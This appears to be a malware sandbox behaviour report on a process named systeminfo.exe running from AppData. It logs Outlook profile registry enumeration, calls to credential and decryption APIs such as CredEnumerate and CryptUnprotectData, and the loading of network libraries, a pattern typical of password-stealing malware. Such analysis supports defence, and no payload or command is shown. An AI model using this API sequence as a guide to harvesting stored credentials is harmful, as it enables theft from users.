Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - False 1
Fn
Module (32)
+
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x742f0000 True 1
Fn
Load shell32.dll base_address = 0x75c50000 True 1
Fn
Load pstorec.dll base_address = 0x74150000 True 1
Fn
Load crypt32.dll base_address = 0x758d0000 True 2
Fn
Load advapi32.dll base_address = 0x756e0000 True 3
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 2
Fn
Get Filename - process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 True 2
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x743109ce True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathA, address_out = 0x75e9fb26 True 1
Fn
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x7415526c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x75905a7f True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredReadA, address_out = 0x757271c1 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredFree, address_out = 0x756eb2ec True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredDeleteA, address_out = 0x75727941 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateA, address_out = 0x75727381 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CredEnumerateW, address_out = 0x75727481 True 3
Fn
System (2)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Info type = Operating System False 1
Fn
Ini (7)
+
Operation Filename Additional Information Success Count Logfile
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = WinPos False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = Columns False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Process #13: systeminfo.exe
(Host: 63, Network: 0)
+
Information Value
ID #13
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:49, Reason: Autostart
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:00:34
OS Process Information
+
Information Value
PID 0x5d8
Parent PID 0x4ec (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f544 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 5DC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x00081fff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0009dfff Private Memory Readable, Writable, Executable True False False
private_0x00000000000a0000 0x000a0000 0x000adfff Private Memory Readable, Writable True False False
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True False False
locale.nls 0x000f0000 0x00156fff Memory Mapped File Readable False False False
private_0x0000000000160000 0x00160000 0x001dffff Private Memory Readable, Writable True False False
private_0x0000000000160000 0x00160000 0x0016ffff Private Memory Readable, Writable, Executable True False False
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False
private_0x0000000000240000 0x00240000 0x0024ffff Private Memory Readable, Writable True False False
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable True False False
systeminfo.exe 0x003d0000 0x003eefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x00000000003f0000 0x003f0000 0x00577fff Pagefile Backed Memory Readable True False False
private_0x00000000005b0000 0x005b0000 0x005bffff Private Memory Readable, Writable True False False
private_0x00000000005c0000 0x005c0000 0x0063ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory Readable True False False
private_0x0000000000810000 0x00810000 0x0090ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01d10000 0x01fdefff Memory Mapped File Readable False False False
pagefile_0x0000000001fe0000 0x01fe0000 0x020befff Pagefile Backed Memory Readable True False False
private_0x00000000020c0000 0x020c0000 0x02490fff Private Memory Readable, Writable True False False
private_0x00000000024a0000 0x024a0000 0x0259ffff Private Memory Readable, Writable True False False
uxtheme.dll 0x73480000 0x734fffff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x73640000 0x73690fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x736a0000 0x736d1fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x736e0000 0x736f3fff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x73700000 0x73707fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73710000 0x7376bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73770000 0x737aefff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74b20000 0x74b2bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74b30000 0x74b8ffff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x74b90000 0x74be6fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x74d90000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x74e30000 0x74f3ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x74f90000 0x7502cfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75030000 0x75039fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75040000 0x7513ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75140000 0x7519ffff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x751c0000 0x7531bfff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75f70000 0x7605ffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76370000 0x7643bfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76440000 0x764cefff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x764d0000 0x7655ffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76700000 0x76745fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76b00000 0x76babfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x76bb0000 0x76bc8fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076bd0000 0x76bd0000 0x76cc9fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x76df0000 0x76f98fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x76fd0000 0x7714ffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Host Behavior
Module (43)
+
Operation Module Additional Information Success Count Logfile
Load msvcrt.dll base_address = 0x76b00000 True 1
Fn
Load KERNEL32.dll base_address = 0x74e30000 True 2
Fn
Load USER32.dll base_address = 0x75040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d90000 True 1
Fn
Get Handle c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe base_address = 0x3d0000 True 1
Fn
Get Filename c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 259 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x34faac True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x34fae4 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x34fb54 True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x34fb54 True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x34fb54 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x34fb54 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x34fb54 True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x34fb54 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x34fb54 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x76b0dbeb True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x76b09894 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x76b09cee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x74ee6aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x74e41700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x74e6828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x74e44435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x74e45929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x74e63102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x74e454ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x74e44442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x74e41245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x74e414b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x74e5b6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x74ec42ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x74e45a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x74e5eceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x74e411c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x74e414e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x76ffe026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x74e414c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x74e411a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x74e41809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x74e411f8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x7506ae5f True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x74dba4b4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x74ec3f49 True 1
Fn
System (13)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Get Time type = Local Time, time = 2017-11-28 18:19:40 (Local Time) True 5
Fn
Get Time type = Ticks, time = 13384 True 4
Fn
Get Time type = Local Time, time = 2017-11-28 18:19:41 (Local Time) True 1
Fn
Mutex (6)
+
Operation Additional Information Success Count Logfile
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Fn
Process #14: systeminfo.exe
(Host: 106, Network: 59)
+
Information Value
ID #14
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:03, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:00:20
OS Process Information
+
Information Value
PID 0x79c
Parent PID 0x5d8 (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f544 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 7A0
0x 7A4
0x 318
0x 760
0x 7D4
0x 794
0x 790
0x 78C
0x 784
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False
private_0x00000000000b0000 0x000b0000 0x000c1fff Private Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x000dffff Private Memory Readable, Writable True False False
private_0x00000000000e0000 0x000e0000 0x000edfff Private Memory Readable, Writable, Executable True False False
private_0x00000000000f0000 0x000f0000 0x000fdfff Private Memory Readable, Writable True False False
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory Readable, Writable, Executable True False False
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory Readable, Writable True False False
locale.nls 0x00210000 0x00276fff Memory Mapped File Readable False False False
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002d0000 0x002d0000 0x002dffff Private Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x002d4fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
private_0x00000000002e0000 0x002e0000 0x0035ffff Private Memory Readable, Writable True False False
systeminfo.exe 0x00360000 0x0037dfff Memory Mapped File Readable True False False
rsaenh.dll 0x00360000 0x0039bfff Memory Mapped File Readable False False False
rsaenh.dll 0x00360000 0x0039bfff Memory Mapped File Readable False False False
pagefile_0x0000000000360000 0x00360000 0x00364fff Pagefile Backed Memory Readable, Writable True False False
windowsshell.manifest 0x00360000 0x00360fff Memory Mapped File Readable False False False
index.dat 0x00360000 0x0036bfff Memory Mapped File Readable, Writable True False False
pagefile_0x0000000000370000 0x00370000 0x00371fff Pagefile Backed Memory Readable True False False
index.dat 0x00380000 0x00387fff Memory Mapped File Readable, Writable True False False
index.dat 0x00390000 0x0039ffff Memory Mapped File Readable, Writable True False False
private_0x00000000003a0000 0x003a0000 0x003a0fff Private Memory Readable, Writable True False False
pagefile_0x00000000003a0000 0x003a0000 0x003a0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c0fff Pagefile Backed Memory Readable True False False
systeminfo.exe 0x003d0000 0x003eefff Memory Mapped File Readable, Writable, Executable True False False
private_0x00000000003f0000 0x003f0000 0x004bffff Private Memory Readable, Writable True False False
private_0x00000000003f0000 0x003f0000 0x0047ffff Private Memory Readable, Writable True False False
private_0x00000000003f0000 0x003f0000 0x0043ffff Private Memory Readable, Writable True False False
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory Readable, Writable True False False
private_0x0000000000430000 0x00430000 0x0046ffff Private Memory Readable, Writable True False False
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory Readable, Writable True False False
private_0x0000000000480000 0x00480000 0x004bffff Private Memory Readable, Writable True False False
private_0x00000000004c0000 0x004c0000 0x005bffff Private Memory Readable, Writable True False False
pagefile_0x00000000005c0000 0x005c0000 0x0069efff Pagefile Backed Memory Readable True False False
private_0x00000000006d0000 0x006d0000 0x006dffff Private Memory Readable, Writable True False False
pagefile_0x00000000006e0000 0x006e0000 0x00867fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000870000 0x00870000 0x009f0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a00000 0x00a00000 0x01dfffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01e00000 0x020cefff Memory Mapped File Readable False False False
private_0x00000000020d0000 0x020d0000 0x024a0fff Private Memory Readable, Writable True False False
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False
private_0x0000000002150000 0x02150000 0x0218ffff Private Memory Readable, Writable True False False
private_0x00000000021d0000 0x021d0000 0x022cffff Private Memory Readable, Writable True False False
private_0x0000000002330000 0x02330000 0x0236ffff Private Memory Readable, Writable True False False
private_0x0000000002370000 0x02370000 0x0246ffff Private Memory Readable, Writable True False False
private_0x00000000024b0000 0x024b0000 0x025affff Private Memory Readable, Writable True False False
private_0x00000000025f0000 0x025f0000 0x0262ffff Private Memory Readable, Writable True False False
private_0x0000000002640000 0x02640000 0x0267ffff Private Memory Readable, Writable True False False
private_0x0000000002700000 0x02700000 0x027fffff Private Memory Readable, Writable True False False
private_0x0000000002800000 0x02800000 0x029affff Private Memory Readable, Writable True False False
private_0x0000000002850000 0x02850000 0x0288ffff Private Memory Readable, Writable True False False
private_0x0000000002900000 0x02900000 0x0293ffff Private Memory Readable, Writable True False False
private_0x0000000002970000 0x02970000 0x029affff Private Memory Readable, Writable True False False
private_0x00000000029d0000 0x029d0000 0x02acffff Private Memory Readable, Writable True False False
private_0x0000000002ad0000 0x02ad0000 0x02bcffff Private Memory Readable, Writable True False False
private_0x0000000002bd0000 0x02bd0000 0x02d4ffff Private Memory Readable, Writable True False False
private_0x0000000002dd0000 0x02dd0000 0x02ecffff Private Memory Readable, Writable True False False
private_0x0000000002ed0000 0x02ed0000 0x02fcffff Private Memory Readable, Writable True False False
uxtheme.dll 0x73480000 0x734fffff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x73640000 0x73690fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x736a0000 0x736d1fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x736e0000 0x736f3fff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x73700000 0x73707fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73710000 0x7376bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73770000 0x737aefff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x74500000 0x74537fff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x74540000 0x74545fff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x74550000 0x74554fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x74560000 0x74567fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74570000 0x745abfff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x745b0000 0x745c1fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x745d0000 0x745dffff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x745e0000 0x745e7fff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x745f0000 0x745fdfff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x74600000 0x74659fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x74660000 0x74665fff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x74670000 0x7467ffff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x74680000 0x74685fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x74690000 0x7469cfff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x746a0000 0x746b4fff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x746c0000 0x74711fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x74720000 0x74726fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x74730000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74750000 0x74793fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x747a0000 0x747c0fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x747d0000 0x7496dfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74970000 0x749aafff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x749b0000 0x749c5fff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x749e0000 0x749ecfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x749f0000 0x749fafff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74a00000 0x74a16fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74b20000 0x74b2bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74b30000 0x74b8ffff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x74b90000 0x74be6fff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x74c20000 0x74c22fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x74d00000 0x74d82fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x74d90000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x74e30000 0x74f3ffff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x74f40000 0x74f84fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x74f90000 0x7502cfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75030000 0x75039fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75040000 0x7513ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75140000 0x7519ffff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x751c0000 0x7531bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75320000 0x75f69fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75f70000 0x7605ffff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x76060000 0x7606bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x760f0000 0x761e4fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x76250000 0x7636cfff Memory Mapped File Readable, Writable, Executable False False False
